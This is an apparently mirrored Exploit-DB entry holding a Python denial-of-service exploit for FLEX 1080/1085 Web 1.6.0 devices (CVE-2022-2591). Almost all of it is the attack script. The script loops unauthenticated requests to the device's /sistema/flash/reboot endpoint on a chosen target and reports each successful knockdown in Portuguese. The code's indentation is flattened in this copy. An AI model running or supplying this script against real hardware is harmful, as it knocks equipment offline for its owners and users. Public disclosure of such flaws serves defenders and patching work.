FLEX 1080 < 1085 Web 1.6.0 - Denial of Service

  • 作者: Mr Empy
    日期: 2023-05-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51438/
  • # Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
    # Date: 2023-05-06
    # Exploit Author: Mr Empy
    # Vendor Homepage: https://www.tem.ind.br/
    # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
    # Version: 1.6.0
    # Tested on: Android
    # CVE ID: CVE-2022-2591
    #!/usr/bin/env python3
    import requests
    import re
    import argparse
    from colorama import Fore
    import time
    
    def main():
    def banner():
    print('''
    _________________
     / ____/ / / ____/ |/ /
    / /_/ / / __/| /
     / __/ / /___/ /___ / |
    /_/ /_____/_____//_/|_|
    
    [FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]
    
    ''')
    def reboot():
    r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
    if 'Rebooting' in r.text:
    pass
    else:
    print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
    não é vulnerável')
    quit()
    
    banner()
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
    while True:
    try:
    reboot()
    print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware
    derrubado com sucesso!')
    time.sleep(1)
    except:
    #print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
    está inativo')
    pass
    
    if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-t','--target', action='store', help='Target',
    dest='target', required=True)
    arguments = parser.parse_args()
    try:
    main()
    except KeyError:
    quit()